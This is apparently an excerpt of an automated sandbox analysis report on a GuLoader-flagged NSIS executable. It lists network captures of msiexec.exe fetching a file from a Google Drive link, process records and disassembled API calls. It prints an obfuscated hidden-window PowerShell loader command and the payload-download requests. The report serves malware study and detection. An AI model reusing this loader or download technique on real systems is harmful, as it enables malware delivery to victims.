2025-01-10 14:45:51 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT3ChIzEipnzJLCW1nBY9hMnrDSe1ACYSZHomNXqOVOfWLsTcx8EdYuc0GIuCu4cCexoWULx1U Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:50 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-qTWvvKDlN3ztMVBdsqVEsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:51 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 64 76 35 46 62 54 77 6d 5a 70 4e 6c 79 74 35 4f 51 68 34 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Idv5FbTwmZpNlyt5OQh4mA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	57097	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:51 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:52 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:52 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-HrgfuE8IgZNTgI7Ihpcg3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	57098	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:52 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:53 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5paZzRAK-3E1VjMQtSMfY5snrS7kFx5Iy_4oAgwhV1MxgbTnAAe6cKN16MMt6RJmpM4rsTr5I Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:53 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ZgLAn8mz622gRtL_1658vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:53 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 47 36 4a 38 49 31 4a 34 65 75 7a 63 30 54 55 7a 36 72 31 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HG6J8I1J4euzc0TUz6r1tQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Target ID:	0
Start time:	09:43:47
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\vq6jxdGvD6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vq6jxdGvD6.exe"
Imagebase:	0x400000
File size:	509'826 bytes
MD5 hash:	05F87E600088108EEC219530590649BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:43:50
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)"
Imagebase:	0xbb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:43:50
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:44:54
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3383420098.00000000075C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.1%
Total number of Nodes:	1334
Total number of Limit Nodes:	32

Executed Functions

Function 004031BB Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004031E0
GetVersion.KERNEL32 ref: 004031E6
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403219
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403255
OleInitialize.OLE32(00000000), ref: 0040325C
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403278
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 0040328D
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\vq6jxdGvD6.exe",00000000,?,00000006,00000008,0000000A), ref: 004032A0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\vq6jxdGvD6.exe",00000020,?,00000006,00000008,0000000A), ref: 004032CB
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033C8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033D9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033E5
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033F9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403401
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403412
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040341A
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040342E

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 0040377F: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Tyfusepidemierne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tyfusepidemierne Setup: Completed,00000000,00000002,76233410), ref: 0040386F
Part of subcall function 0040377F: lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
Part of subcall function 0040377F: GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
Part of subcall function 0040377F: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
Part of subcall function 0040377F: RegisterClassA.USER32(00422EA0), ref: 00403913

Part of subcall function 004036A5: CloseHandle.KERNEL32(000002CC,004034DC,?,?,00000006,00000008,0000000A), ref: 004036B0

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034DC
ExitProcess.KERNEL32 ref: 004034FD
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040361A
OpenProcessToken.ADVAPI32(00000000), ref: 00403621
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403639
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403658
ExitWindowsEx.USER32(00000002,80040002), ref: 0040367C
ExitProcess.KERNEL32 ref: 0040369F

Part of subcall function 0040564B: MessageBoxIndirectA.USER32(00409218), ref: 004056A6

Strings

`K$v, xrefs: 00403406
Low, xrefs: 004033FB
~nsu, xrefs: 00403508
SeShutdownPrivilege, xrefs: 00403633
C:\Users\user\AppData\Local\unshabbily, xrefs: 004033AD, 004034AE, 00403558, 00403561
C:\Users\user\Desktop, xrefs: 0040352F, 00403534, 00403560
C:\Users\user\AppData\Local\Temp\, xrefs: 004033BD, 004033C2, 004033D8, 004033E4, 004033F3, 00403400, 0040340C, 00403414, 0040350D, 0040351E, 00403529, 00403535, 00403542, 00403551, 00403600
Error launching installer, xrefs: 00403494
", xrefs: 004032F0
TEMP, xrefs: 0040340D
NSIS Error, xrefs: 0040327E
1033, xrefs: 00403429
\Temp, xrefs: 004033DF
UXTHEME, xrefs: 0040320D, 00403212, 00403218
C:\Users\user\Desktop\vq6jxdGvD6.exe, xrefs: 004035BA
C:\Users\user\AppData\Local\unshabbily\Toral, xrefs: 004034B9
.tmp, xrefs: 00403524
TMP, xrefs: 00403415
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 00403293, 00403299, 00403452

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\vq6jxdGvD6.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\AppData\Local\unshabbily\Toral$C:\Users\user\Desktop$C:\Users\user\Desktop\vq6jxdGvD6.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K$v$~nsu
API String ID: 3855923921-635317002
Opcode ID: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction ID: af4360d81dc256b8c9424dc56f1358f7fe08c6a718ebf40f6c8df5272bc15683
Opcode Fuzzy Hash: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction Fuzzy Hash: 14C1F5706086427AE7217F719D49B2B3EACEB85306F04457FF541B62E2C77C9A058B2E

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004051F3
GetDlgItem.USER32(?,000003EE), ref: 00405202
GetClientRect.USER32(?,?), ref: 0040523F
GetSystemMetrics.USER32(00000002), ref: 00405246
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405267
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405278
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040528B
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405299
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052AC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052CE
ShowWindow.USER32(?,00000008), ref: 004052E2
GetDlgItem.USER32(?,000003EC), ref: 00405303
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405313
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040532C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405338
GetDlgItem.USER32(?,000003F8), ref: 00405211

Part of subcall function 00404025: SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

GetDlgItem.USER32(?,000003EC), ref: 00405354
CreateThread.KERNELBASE(00000000,00000000,Function_00005128,00000000), ref: 00405362
CloseHandle.KERNELBASE(00000000), ref: 00405369
ShowWindow.USER32(00000000), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 00405393
ShowWindow.USER32(00000008), ref: 004053D9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540D
CreatePopupMenu.USER32 ref: 0040541E
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405433
GetWindowRect.USER32(?,000000FF), ref: 00405453
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040546C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054A8
OpenClipboard.USER32(00000000), ref: 004054B8
EmptyClipboard.USER32 ref: 004054BE
GlobalAlloc.KERNEL32(00000042,?), ref: 004054C7
GlobalLock.KERNEL32(00000000), ref: 004054D1
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E5
GlobalUnlock.KERNEL32(00000000), ref: 004054FE
SetClipboardData.USER32(00000001,00000000), ref: 00405509
CloseClipboard.USER32 ref: 0040550F

Strings

Tyfusepidemierne Setup: Completed, xrefs: 00405484

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Tyfusepidemierne Setup: Completed
API String ID: 590372296-1459920134
Opcode ID: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction ID: ffe0cad38c51bf677d90d52cc1be9089f0253f1d9aa70b106fb857e880bd7d9d
Opcode Fuzzy Hash: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction Fuzzy Hash: B5A15AB1900208BFDB119FA4DD89AAE7F79FB08355F00403AFA05B62A0C7B55E51DF69

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405720
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405768
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405789
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040578F
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A0
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040584D
FindClose.KERNEL32(00000000), ref: 0040585E

Strings

\*.*, xrefs: 00405762
C:\Users\user\AppData\Local\Temp\, xrefs: 00405704
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 004056F7

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\vq6jxdGvD6.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2927804788
Opcode ID: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction ID: 5202cdaf7196988d1da3935d2d892696f3640e5f60657e92f8c59f35d89726bd
Opcode Fuzzy Hash: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction Fuzzy Hash: 02519F32800A04BADB217B618C45BAF7B78DF42754F14847BF851761D2D73C8A92DEAE

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction ID: 82117b2ed1b037f842d7e8ec4a077ce5a2ba4b06f200654bc1e2ca7552b06de8
Opcode Fuzzy Hash: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction Fuzzy Hash: BCF16474D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44

Function 00406232 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(76233410,00421558,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,004059F8,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,C:\Users\user\AppData\Local\Temp\nsb129A.tmp,76233410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 0040623D
FindClose.KERNEL32(00000000), ref: 00406249

Strings

